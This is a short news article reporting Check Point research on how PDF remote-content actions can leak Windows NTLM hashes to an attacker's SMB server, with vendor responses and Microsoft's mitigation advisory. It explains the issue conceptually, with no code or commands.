Hackers Can Steal Windows Credentials Through PDF Files

Cybercriminals can exploit PDF files to steal Windows credentials (NTLM hashes) without any user interaction—just by opening the file. In a study published this week, Check Point researcher Assaf Baharav demonstrated how an attacker can use a built-in PDF standard feature to capture NTLM hashes, which Windows uses to store user credentials.

According to Baharav, the PDF specification allows for loading remote content using the GoToR (Go To Remote) and GoToE (Go To Embedded) actions. During his research, Baharav created a PDF document that uses these actions. When the document is opened, it automatically sends a request to a remote, malicious SMB server. By default, all SMB requests include NTLM hashes for authentication, which are then logged by the SMB server. Attackers can use existing tools to crack these NTLM hashes and extract user credentials.

This type of attack is not new—it has previously been carried out by triggering SMB requests from Outlook and Office documents, shared folders, and more. Now, PDF documents have been added to the list of potential attack vectors.

Baharav successfully tested the attack on Adobe Acrobat and FoxIT Reader, and privately notified the vendors about the vulnerability. FoxIT did not respond, while Adobe stated they do not plan to take any action, referring to their existing security advisory ADV170014.

Microsoft released advisory ADV170014 in October 2017, which provides instructions on disabling NTLM SSO authentication to prevent NTLM hash theft via SMB requests sent to servers outside the local network.

What Is Single Sign-On (SSO)?

Single Sign-On (SSO) is a technology that allows users to move between different sections of a portal without having to re-authenticate each time.